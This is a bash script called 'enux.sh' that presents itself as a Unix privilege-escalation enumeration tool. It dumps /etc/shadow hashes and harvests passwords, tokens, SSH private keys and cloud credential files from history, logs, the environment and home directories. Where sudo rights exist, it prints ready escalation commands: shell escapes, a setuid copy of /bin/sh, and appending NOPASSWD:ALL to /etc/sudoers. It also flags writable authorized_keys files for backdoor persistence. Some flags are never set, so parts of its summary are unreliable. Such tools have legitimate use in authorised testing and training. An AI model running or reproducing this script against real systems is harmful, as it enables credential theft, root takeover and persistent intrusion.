#!/bin/bash

# ==============================
# Central logging function FIRST!
# ==============================
LOG_FILE="enux.log"
> "$LOG_FILE"

# Colours
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
BLUE='\033[0;34m'
NC='\033[0m'

log() {
    echo -e "[$(date '+%Y-%m-%d %H:%M:%S')] $1" | tee -a "$LOG_FILE"
}

# ------------------- VARS
SHADOW_READABLE=""
PKG_BACKDOORS_FOUND=""
CLOUD_CREDS_FOUND=""
NETWORK_SSH=""
NETWORK_WEB=""
NETWORK_DB=""
NETWORK_PUBLIC_LISTEN=""
SOCKETS_FOUND=""
WRITABLE_CRONS_FOUND=""
HIGH_ENTROPY_FOUND=""
CUSTOM_ROOT_PROC_FOUND=""
AUTH_KEYS_WRITABLE=""

# ==================
# Banner & Version
# ==================
log "${BLUE}\n================================================================"
log "          enux.sh — Enhanced Unix Privilege Escalation"
log "================================================================${NC}"
log "  Version: 1.0        Author: 3ctr1x"
log "  [Log file: $LOG_FILE]"
log "----------------------------------------------------------------"

# ================================
# [ 1. Host / Virtualization Info ]
# ================================
log "${BLUE}\n================================================================"
log "  [1] HOST & VIRTUALIZATION INFORMATION"
log "================================================================${NC}"

VIRT_ENV=""
if grep -qE 'docker|lxc' /proc/1/cgroup 2>/dev/null; then
    VIRT_ENV="Container (Docker/LXC)"
    log "${GREEN}[+] Detected: $VIRT_ENV${NC}"
elif command -v systemd-detect-virt &>/dev/null && systemd-detect-virt -q; then
    VIRT_ENV=$(systemd-detect-virt)
    log "${GREEN}[+] Detected Virtual Environment: $VIRT_ENV${NC}"
else
    log "${YELLOW}[-] No obvious container or virtualization environment detected.${NC}"
fi

log "${YELLOW}    Hostname: $(hostname)"
log "    OS: $(uname -s) $(uname -r) $(uname -v)"
log "    Architecture: $(uname -m)"

if [[ -n "$VIRT_ENV" ]]; then
    log "${GREEN}[TIP] You're likely in $VIRT_ENV; escalation may require container escape or VM breakout.${NC}"
else
    log "${YELLOW}[TIP] No virtualization detected; escalation may be more direct if system is not hardened.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# =================================
# [ 2. Kernel & CPU Enumeration ]
# =================================
log "${BLUE}\n================================================================"
log "  [2] KERNEL & CPU INFORMATION"
log "================================================================${NC}"

KERNEL_VERSION=$(uname -r)
log "${YELLOW}    Kernel Version: $KERNEL_VERSION"
log "    CPU Model: $(lscpu | grep 'Model name' | awk -F: '{print $2}' | xargs)"
log "    CPU Cores: $(lscpu | grep '^CPU(s):' | awk '{print $2}')"
log "    Threads per Core: $(lscpu | grep 'Thread(s) per core:' | awk '{print $4}')"
log "    Total Threads: $(nproc)"

log "${GREEN}[TIP] Check for kernel-specific exploits matching: $KERNEL_VERSION"
log "      Use searchsploit/exploitdb.com for possible escalation exploits.${NC}"

# ---------- Kernel CVEs
log "${YELLOW}\n    [*] Searching for public kernel exploits (CVEs):${NC}"
CVE_LIST=$(curl -s "https://www.exploit-db.com/search?text=$KERNEL_VERSION" | grep -o 'CVE-[0-9]\{4\}-[0-9]\{4,5\}' | sort -u)
if [[ -n "$CVE_LIST" ]]; then
    echo "$CVE_LIST" | tee -a "$LOG_FILE"
else
    log "      [No kernel CVEs found for this version on Exploit-DB]"
fi

log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 3. Network Enumeration ]
# ===============================
log "${BLUE}\n================================================================"
log "  [3] NETWORK ENUMERATION"
log "================================================================${NC}"

log "${YELLOW}[1] Network Interfaces and IPs:${NC}"
ip a | tee -a "$LOG_FILE"
log "${YELLOW}[2] Routing Table:${NC}"
ip route | tee -a "$LOG_FILE"
log "${YELLOW}[3] Listening Services (TCP/UDP):${NC}"
LISTENING=$(ss -tulnp 2>/dev/null)
if [[ -z "$LISTENING" ]]; then
    LISTENING=$(netstat -tulnp 2>/dev/null)
    ESTABLISHED=$(netstat -tunap 2>/dev/null | grep ESTAB)
else
    ESTABLISHED=$(ss -tunap 2>/dev/null | grep ESTAB)
fi
echo "$LISTENING" | tee -a "$LOG_FILE"
log "${YELLOW}[4] Established Connections:${NC}"
echo "$ESTABLISHED" | tee -a "$LOG_FILE"

[[ "$LISTENING" =~ ":22" ]] && { NETWORK_SSH=true; }
[[ "$LISTENING" =~ ":80" || "$LISTENING" =~ ":443" ]] && { NETWORK_WEB=true; }
[[ "$LISTENING" =~ ":3306" ]] && { NETWORK_DB=true; }
[[ "$LISTENING" =~ "0.0.0.0" ]] && { NETWORK_PUBLIC_LISTEN=true; }

log "${GREEN}--- Network Section Summary:${NC}"
[[ "$NETWORK_SSH" ]] && log "${GREEN}  - SSH detected (port 22)${NC}"
[[ "$NETWORK_WEB" ]] && log "${GREEN}  - Web service detected (port 80/443)${NC}"
[[ "$NETWORK_DB" ]] && log "${GREEN}  - MySQL detected (port 3306)${NC}"
[[ "$NETWORK_PUBLIC_LISTEN" ]] && log "${YELLOW}  - Public services listening on all interfaces${NC}"
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 4. Sudo Privilege Escalation ]
# ===============================
log "${BLUE}\n================================================================"
log "  [4] SUDO PRIVILEGE ENUMERATION"
log "================================================================${NC}"

log "${YELLOW}[1] Sudo Commands Available:${NC}"
SUDO_CMDS=$(sudo -n -l 2>/dev/null)
if [[ -z "$SUDO_CMDS" ]]; then
    log "${RED}  - No sudo privileges detected.${NC}"
else
    log "$SUDO_CMDS"
    if echo "$SUDO_CMDS" | grep -q "NOPASSWD"; then
        log "${GREEN}[!] Sudo commands can be run without a password!${NC}"
    fi
    # Show suggested exploits for whitelisted commands
    declare -A SUDO_EXPLOITS=(
        ["find"]="sudo find . -exec /bin/sh \; -quit"
        ["vim"]="sudo vim -c ':!/bin/sh'"
        ["tar"]="sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh"
        ["python3"]="sudo python3 -c 'import os; os.system(\"/bin/sh\")'"
        ["perl"]="sudo perl -e 'exec \"/bin/sh\";'"
        ["awk"]="sudo awk 'BEGIN {system(\"/bin/sh\")}'"
        ["nmap"]="sudo nmap --interactive; !sh"
        ["less"]="sudo less /etc/passwd; !sh"
        ["nano"]="sudo nano /etc/sudoers"
        ["cp"]="sudo cp /bin/sh /tmp/sh && sudo chmod +s /tmp/sh && /tmp/sh"
        ["tee"]="echo \"user ALL=(ALL) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers"
        ["bash"]="sudo bash"
        ["sh"]="sudo sh"
        ["lua"]="sudo lua -e 'os.execute(\"/bin/sh\")'"
        ["ruby"]="sudo ruby -e 'exec \"/bin/sh\"'"
        ["php"]="sudo php -r 'system(\"/bin/sh\");'"
    )
    for CMD in "${!SUDO_EXPLOITS[@]}"; do
        if echo "$SUDO_CMDS" | grep -q "$CMD"; then
            log "${GREEN}[TIP] Exploit with: ${SUDO_EXPLOITS[$CMD]}${NC}"
        fi
    done
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 5. Command History Review ]
# ===============================
log "${BLUE}\n================================================================"
log "  [5] COMMAND HISTORY (Sensitive Entries)"
log "================================================================${NC}"

CMD_HISTORY=$(grep -E "password|passwd|token|apikey|secret|sudo|su |chmod|chown|scp|ssh" ~/.bash_history ~/.zsh_history 2>/dev/null)
if [[ -n "$CMD_HISTORY" ]]; then
    echo "$CMD_HISTORY" | tee -a "$LOG_FILE"
    log "${GREEN}[TIP] Reuse found commands/credentials as possible escalation paths.${NC}"
else
    log "${YELLOW}  - No sensitive history entries found.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 6. User Enumeration ]
# ===============================
log "${BLUE}\n================================================================"
log "  [6] USER ENUMERATION"
log "================================================================${NC}"

log "${YELLOW}[1] All System Users:${NC}"
getent passwd | awk -F: '{ print $1 " (UID: " $3 ", GID: " $4 ", Home: " $6 ", Shell: " $7 ")" }' | tee -a "$LOG_FILE"

log "${YELLOW}[2] Current Logged-in Users:${NC}"
who | tee -a "$LOG_FILE"

log "${YELLOW}[3] Last 10 Logins:${NC}"
last -a | head -n 10 | tee -a "$LOG_FILE"

log "${GREEN}--- User Section Summary:${NC}"
log "${GREEN}  - Look for users with UID 0, weird shells, or no home directory for misconfigurations."
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 7. /etc/shadow File Check ]
# ===============================
log "${BLUE}\n================================================================"
log "  [7] /etc/shadow ACCESS"
log "================================================================${NC}"

if [[ -r /etc/shadow ]]; then
    SHADOW_READABLE=true
    log "${RED}[!] /etc/shadow is READABLE! Dumping password hashes below:${NC}"
    grep -vE '^#' /etc/shadow | tee -a "$LOG_FILE"
    log "${GREEN}[TIP] Try cracking these hashes using john/hashcat or check for password reuse.${NC}"
else
    log "${YELLOW}  - /etc/shadow not readable (expected for most users).${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 8. Suspicious Packages ]
# ===============================
log "${BLUE}\n================================================================"
log "  [8] SUSPICIOUS PACKAGES (Backdoors/Shells)"
log "================================================================${NC}"

if command -v dpkg &>/dev/null; then
    log "${YELLOW}[1] dpkg - known suspicious packages:${NC}"
    dpkg -l | grep -Ei 'shell|backdoor|reverse|exploit|hack|meterpreter' | tee -a "$LOG_FILE"
fi
if command -v rpm &>/dev/null; then
    log "${YELLOW}[2] rpm - suspicious packages:${NC}"
    rpm -qa | grep -Ei 'shell|backdoor|reverse|exploit|hack|meterpreter' | tee -a "$LOG_FILE"
fi
if command -v pip &>/dev/null; then
    log "${YELLOW}[3] pip - suspicious python modules:${NC}"
    pip list | grep -Ei 'pty|shell|pwntools|backdoor|revshell|rce|payload' | tee -a "$LOG_FILE"
fi
if command -v npm &>/dev/null; then
    log "${YELLOW}[4] npm - suspicious node modules:${NC}"
    npm list -g --depth=0 2>/dev/null | grep -Ei 'shell|reverse|payload|rce|backdoor' | tee -a "$LOG_FILE"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 9. Cron Jobs & Exploitable Crons ]
# ===============================
log "${BLUE}\n================================================================"
log "  [9] CRON JOBS (Persistence/Exploitation)"
log "================================================================${NC}"

CRON_JOBS=$(crontab -l 2>/dev/null; cat /etc/crontab /etc/cron.d/* 2>/dev/null)
if [[ -n "$CRON_JOBS" ]]; then
    log "${YELLOW}[1] All cron jobs:${NC}"
    echo "$CRON_JOBS" | tee -a "$LOG_FILE"
    WRITABLE_CRON_SCRIPTS=$(find /etc/cron* -type f -writable 2>/dev/null)
    WRITABLE_CRON_DIRS=$(find /etc/cron* -type d -perm -002 2>/dev/null)
    if [[ -n "$WRITABLE_CRON_SCRIPTS" ]]; then
        log "${RED}[!] Writable cron scripts:${NC}"
        echo "$WRITABLE_CRON_SCRIPTS" | tee -a "$LOG_FILE"
        WRITABLE_CRONS_FOUND=true
    fi
    if [[ -n "$WRITABLE_CRON_DIRS" ]]; then
        log "${RED}[!] Writable cron directories:${NC}"
        echo "$WRITABLE_CRON_DIRS" | tee -a "$LOG_FILE"
        WRITABLE_CRONS_FOUND=true
    fi
else
    log "${YELLOW}  - No cron jobs found.${NC}"
fi

log "${GREEN}--- Cron Section Summary:${NC}"
[[ "$WRITABLE_CRONS_FOUND" ]] && log "${GREEN}  - Writable cron jobs or directories found! Persistence possible!${NC}" || log "${GREEN}  - No writable crons detected.${NC}"
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 10. SUID/SGID Binaries ]
# ===============================
log "${BLUE}\n================================================================"
log "  [10] SUID BINARIES (Privilege Escalation)"
log "================================================================${NC}"

SUID_RESULTS=$(find / -perm -4000 -type f 2>/dev/null)
if [[ -n "$SUID_RESULTS" ]]; then
    log "${YELLOW}[1] SUID Binaries:${NC}"
    echo "$SUID_RESULTS" | tee -a "$LOG_FILE"
    # Cross-ref with GTFOBins
    declare -a GTFO_SUID=(
        "bash" "find" "vim" "nmap" "less" "more" "nano" "cp" "mv"
        "python" "python3" "perl" "ruby" "awk" "tar" "env" "tee"
        "openssl" "rsync" "mount" "umount" "systemctl" "tcpdump"
    )
    for BIN in "${GTFO_SUID[@]}"; do
        FOUND=$(echo "$SUID_RESULTS" | grep -E "/$BIN$" 2>/dev/null)
        if [[ -n "$FOUND" ]]; then
            log "${GREEN}[GTFOBin] $FOUND  (https://gtfobins.github.io/gtfobins/$BIN/)${NC}"
        fi
    done
else
    log "${YELLOW}  - No SUID binaries found (or not visible to user).${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 11. Lateral Movement ]
# ===============================
log "${BLUE}\n================================================================"
log "  [11] LATERAL MOVEMENT ARTIFACTS"
log "================================================================${NC}"

log "${YELLOW}[1] World-readable Home Directories:${NC}"
READABLE_HOMES=$(find /home -maxdepth 1 -type d -perm -o+r 2>/dev/null)
echo "$READABLE_HOMES" | tee -a "$LOG_FILE"

log "${YELLOW}[2] Discovered SSH Private Keys:${NC}"
SSH_KEYS=$(find /home -type f -name "id_rsa" -o -name "*.pem" 2>/dev/null)
echo "$SSH_KEYS" | tee -a "$LOG_FILE"

log "${YELLOW}[3] Writable .ssh Directories:${NC}"
WRITABLE_SSH_DIRS=$(find /home -type d -name ".ssh" -perm -o+w 2>/dev/null)
echo "$WRITABLE_SSH_DIRS" | tee -a "$LOG_FILE"

log "${YELLOW}[4] Writable authorized_keys files:${NC}"
WRITABLE_AUTH_KEYS=$(find /home -type f -name "authorized_keys" -perm -o+w 2>/dev/null)
echo "$WRITABLE_AUTH_KEYS" | tee -a "$LOG_FILE"

if [[ -n "$WRITABLE_AUTH_KEYS" ]]; then
    AUTH_KEYS_WRITABLE=true
    while IFS= read -r FILE; do
        OWNER=$(stat -c '%U' "$FILE")
        if id -u "$OWNER" 2>/dev/null | grep -q '^0$'; then
            log "${RED}[!] Writable authorized_keys for root!${NC}"
        fi
    done <<< "$WRITABLE_AUTH_KEYS"
fi

log "${GREEN}--- Lateral Movement Summary:${NC}"
[[ "$SSH_KEYS" ]] && log "${GREEN}  - SSH keys found; try them for lateral movement.${NC}"
[[ "$WRITABLE_SSH_DIRS" ]] && log "${GREEN}  - Writable .ssh/ dirs; can implant backdoor key.${NC}"
[[ "$AUTH_KEYS_WRITABLE" ]] && log "${RED}  - Writable authorized_keys; easy persistence!${NC}"
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 12. Credential Discovery ]
# ===============================
log "${BLUE}\n================================================================"
log "  [12] CREDENTIAL DISCOVERY (Files/Logs)"
log "================================================================${NC}"

SENSITIVE_FILES=$(grep -rniE "password|passwd|token|apikey|secret|bearer|authorization|jwt" /var/log /etc /opt /home 2>/dev/null)
if [[ -n "$SENSITIVE_FILES" ]]; then
    echo "$SENSITIVE_FILES" | tee -a "$LOG_FILE"
    log "${GREEN}  - Sensitive values found; check for usable credentials.${NC}"
else
    log "${YELLOW}  - No credential strings found in quick scan.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 13. Cloud Credential Discovery ]
# ===============================
log "${BLUE}\n================================================================"
log "  [13] CLOUD PROVIDER CREDENTIALS"
log "================================================================${NC}"

AWS_CREDS=$(find /home /root -type f \( -name "credentials" -o -name "config" \) -path "*/.aws/*" 2>/dev/null)
GCP_CREDS=$(find /home /root -type f -name "*.json" -path "*/.config/gcloud/*" 2>/dev/null)
AZURE_CREDS=$(find /home /root -type f -name "*.json" -path "*/.azure/*" 2>/dev/null)
DO_CREDS=$(find /home /root -type f -path "*/.config/doctl/*" 2>/dev/null)
if [[ -n "$AWS_CREDS$GCP_CREDS$AZURE_CREDS$DO_CREDS" ]]; then
    log "${RED}  - Cloud provider config/credential files found!${NC}"
    CLOUD_CREDS_FOUND=true
    [[ -n "$AWS_CREDS" ]] && log "    AWS: $AWS_CREDS"
    [[ -n "$GCP_CREDS" ]] && log "    GCP: $GCP_CREDS"
    [[ -n "$AZURE_CREDS" ]] && log "    Azure: $AZURE_CREDS"
    [[ -n "$DO_CREDS" ]] && log "    DigitalOcean: $DO_CREDS"
else
    log "${YELLOW}  - No obvious cloud credential files found.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 14. File Permissions ]
# ===============================
log "${BLUE}\n================================================================"
log "  [14] FILE PERMISSION EXPLOITATION"
log "================================================================${NC}"

WRITABLE_SECURITY=$(find /etc -type f -perm -g=w,o=w 2>/dev/null)
WRITABLE_ROOT_SCRIPTS=$(find /usr/local/bin /usr/bin /bin /sbin -type f -perm -002 -user root 2>/dev/null)
if [[ -n "$WRITABLE_SECURITY" ]]; then
    log "${RED}  - Writable security files in /etc:${NC}"
    echo "$WRITABLE_SECURITY" | tee -a "$LOG_FILE"
fi
if [[ -n "$WRITABLE_ROOT_SCRIPTS" ]]; then
    log "${RED}  - Writable root-owned scripts:${NC}"
    echo "$WRITABLE_ROOT_SCRIPTS" | tee -a "$LOG_FILE"
fi
[[ -z "$WRITABLE_SECURITY$WRITABLE_ROOT_SCRIPTS" ]] && log "${YELLOW}  - No writable config or privileged scripts found.${NC}"
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 15. Environment Secrets ]
# ===============================
log "${BLUE}\n================================================================"
log "  [15] ENVIRONMENT VARIABLES (Secrets)"
log "================================================================${NC}"

ENV_SECRETS=$(env | grep -iE 'pass|secret|key|token|auth')
if [[ -n "$ENV_SECRETS" ]]; then
    log "${RED}  - Potential secrets in environment:${NC}"
    echo "$ENV_SECRETS" | tee -a "$LOG_FILE"
else
    log "${YELLOW}  - No sensitive environment variables detected.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 16. Writable Init/Systemd Scripts ]
# ===============================
log "${BLUE}\n================================================================"
log "  [16] WRITABLE STARTUP SCRIPTS (init/systemd)"
log "================================================================${NC}"

WRITABLE_STARTUP=$(find /etc/init.d /etc/systemd/system -type f -writable 2>/dev/null)
if [[ -n "$WRITABLE_STARTUP" ]]; then
    log "${RED}  - Writable startup scripts:${NC}"
    echo "$WRITABLE_STARTUP" | tee -a "$LOG_FILE"
else
    log "${YELLOW}  - No writable init/systemd scripts found.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 17. Writable $PATH Directories ]
# ===============================
log "${BLUE}\n================================================================"
log "  [17] WORLD-WRITABLE DIRECTORIES IN \$PATH"
log "================================================================${NC}"

WRITABLE_PATH_DIRS=$(echo "$PATH" | tr ':' '\n' | xargs -I{} find {} -type d -perm -0002 2>/dev/null)
if [[ -n "$WRITABLE_PATH_DIRS" ]]; then
    log "${RED}  - Writable directories in \$PATH:${NC}"
    echo "$WRITABLE_PATH_DIRS" | tee -a "$LOG_FILE"
else
    log "${YELLOW}  - No writable directories in \$PATH.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 18. LD_PRELOAD / LD_LIBRARY_PATH ]
# ===============================
log "${BLUE}\n================================================================"
log "  [18] LD_PRELOAD / LD_LIBRARY_PATH Checks"
log "================================================================${NC}"

LD_ENV=$(env | grep -E 'LD_PRELOAD|LD_LIBRARY_PATH')
if [[ -n "$LD_ENV" ]]; then
    log "${RED}  - LD_PRELOAD/LD_LIBRARY_PATH set:${NC}"
    echo "$LD_ENV" | tee -a "$LOG_FILE"
else
    log "${YELLOW}  - Not set in this session.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 19. Suspicious Root Processes ]
# ===============================
log "${BLUE}\n================================================================"
log "  [19] SUSPICIOUS ROOT-OWNED BACKGROUND PROCESSES"
log "================================================================${NC}"

ROOT_PROCS=$(ps -U root -u root u | grep -vE '(^root.*(sshd|bash|systemd|init|kthreadd|ps|grep))')
if [[ -n "$ROOT_PROCS" ]]; then
    CUSTOM_ROOT_PROC_FOUND=true
    log "${RED}  - Unusual root background processes:${NC}"
    echo "$ROOT_PROCS" | tee -a "$LOG_FILE"
else
    log "${YELLOW}  - No suspicious root background processes.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 20. Temp Folder Script Discovery ]
# ===============================
log "${BLUE}\n================================================================"
log "  [20] /tmp, /dev/shm, /var/tmp: Suspicious Scripts"
log "================================================================${NC}"

TMP_SCRIPTS=$(find /tmp /dev/shm /var/tmp -type f \( -iname "*.sh" -o -iname "*.py" -o -iname "*.pl" -o -iname "*.php" -o -iname "*.out" -o -iname "*reverse*" \) 2>/dev/null)
if [[ -n "$TMP_SCRIPTS" ]]; then
    log "${RED}  - Suspicious scripts in temp folders:${NC}"
    echo "$TMP_SCRIPTS" | tee -a "$LOG_FILE"
else
    log "${YELLOW}  - No scripts found in temp directories.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 21. Unix Domain Sockets ]
# ===============================
log "${BLUE}\n================================================================"
log "  [21] UNIX DOMAIN SOCKETS (.sock files)"
log "================================================================${NC}"

SOCKET_FILES=$(find /var/run /tmp /dev/shm /run /home -type s 2>/dev/null)
if [[ -n "$SOCKET_FILES" ]]; then
    SOCKETS_FOUND=true
    log "${RED}  - Unix socket files found:${NC}"
    echo "$SOCKET_FILES" | tee -a "$LOG_FILE"
    WRITABLE_SOCKS=$(find /var/run /tmp /dev/shm /run /home -type s -perm -o+w 2>/dev/null)
    if [[ -n "$WRITABLE_SOCKS" ]]; then
        log "${RED}  - Writable sockets:${NC}"
        echo "$WRITABLE_SOCKS" | tee -a "$LOG_FILE"
    fi
else
    log "${YELLOW}  - No socket files found in common IPC dirs.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ 22. Binary Capabilities ]
# ===============================
log "${BLUE}\n================================================================"
log "  [22] BINARY CAPABILITIES (getcap)"
log "================================================================${NC}"

BIN_CAPS=$(getcap -r / 2>/dev/null | grep -v '^$')
if [[ -n "$BIN_CAPS" ]]; then
    log "${RED}  - Binaries with capabilities set:${NC}"
    echo "$BIN_CAPS" | tee -a "$LOG_FILE"
else
    log "${YELLOW}  - No binaries with capabilities found.${NC}"
fi
log "${BLUE}----------------------------------------------------------------${NC}"

# ===============================
# [ FINAL SUMMARY ]
# ===============================
log "${BLUE}\n================================================================"
log "  HIGH-LEVEL FINDINGS SUMMARY"
log "================================================================${NC}"
[[ -n "$VIRT_ENV" ]] && log "${GREEN}[+] Virtualization Detected: $VIRT_ENV${NC}"
[[ -n "$SUDO_CMDS" ]] && log "${GREEN}[+] Sudo Access Detected${NC}"
if [[ "$NETWORK_SSH" || "$NETWORK_WEB" || "$NETWORK_DB" || "$NETWORK_PUBLIC_LISTEN" ]]; then
    log "${GREEN}[+] Network Services Detected — SSH, Web, DB, or Public${NC}"
fi
[[ -n "$SUID_RESULTS" ]] && log "${GREEN}[+] SUID Binaries Present${NC}"
[[ -n "$CMD_HISTORY" ]] && log "${GREEN}[+] Sensitive Commands in Shell History${NC}"
[[ -n "$SHADOW_READABLE" ]] && log "${RED}[+] /etc/shadow is Readable — Password Hashes Dumped${NC}"
[[ -n "$PKG_BACKDOORS_FOUND" ]] && log "${RED}[+] Suspicious Packages Detected via dpkg/pip/npm${NC}"
[[ -n "$ENV_SECRETS" ]] && log "${RED}[+] Secrets Found in Environment Variables${NC}"
[[ -n "$CLOUD_CREDS_FOUND" ]] && log "${RED}[+] Cloud Provider Credentials Found (AWS/GCP/Azure/DO)${NC}"
[[ -n "$WRITABLE_STARTUP" ]] && log "${RED}[+] Writable Startup Scripts Detected${NC}"
[[ -n "$WRITABLE_PATH_DIRS" ]] && log "${RED}[+] Writable Directories in \$PATH${NC}"
[[ -n "$LD_ENV" ]] && log "${RED}[+] LD_PRELOAD or LD_LIBRARY_PATH Set${NC}"
[[ -n "$ROOT_PROCS" ]] && log "${RED}[+] Suspicious Root-Owned Background Processes${NC}"
[[ -n "$TMP_SCRIPTS" ]] && log "${RED}[+] Scripts Found in /tmp or Shared Memory${NC}"
[[ -n "$SSH_KEYS" ]] && log "${RED}[+] SSH Private Keys Discovered${NC}"
[[ -n "$WRITABLE_SSH_DIRS" ]] && log "${RED}[+] Writable .ssh Directories Detected${NC}"
[[ -n "$SOCKETS_FOUND" ]] && log "${RED}[+] Unix Socket Files Detected — Check for Privileged Daemons or IPC Access${NC}"
[[ -n "$AUTH_KEYS_WRITABLE" ]] && log "${RED}[+] Writable authorized_keys Files Found — Possible Backdoor/Persistence Vector${NC}"
[[ -n "$WRITABLE_CRONS_FOUND" ]] && log "${RED}[+] Writable Cron Jobs or Scripts Found — Possible Code Execution Path${NC}"
[[ -n "$HIGH_ENTROPY_FOUND" ]] && log "${RED}[+] High-Entropy Strings Found — May Contain API Keys, JWTs, or Secrets${NC}"
[[ -n "$CUSTOM_ROOT_PROC_FOUND" ]] && log "${RED}[+] Non-standard Root-Owned Background Processes Detected${NC}"
[[ -n "$WRITABLE_SECURITY" ]] && log "${RED}[+] Writable Files in /etc${NC}"
[[ -n "$WRITABLE_ROOT_SCRIPTS" ]] && log "${RED}[+] Writable Root-Owned Scripts Detected${NC}"
[[ -n "$BIN_CAPS" ]] && log "${RED}[+] Binaries with Capabilities Found (getcap)${NC}"

log "\n${BLUE}=============================================================="
log "[*] Enumeration completed. Check $LOG_FILE for full details."
log "==============================================================${NC}"

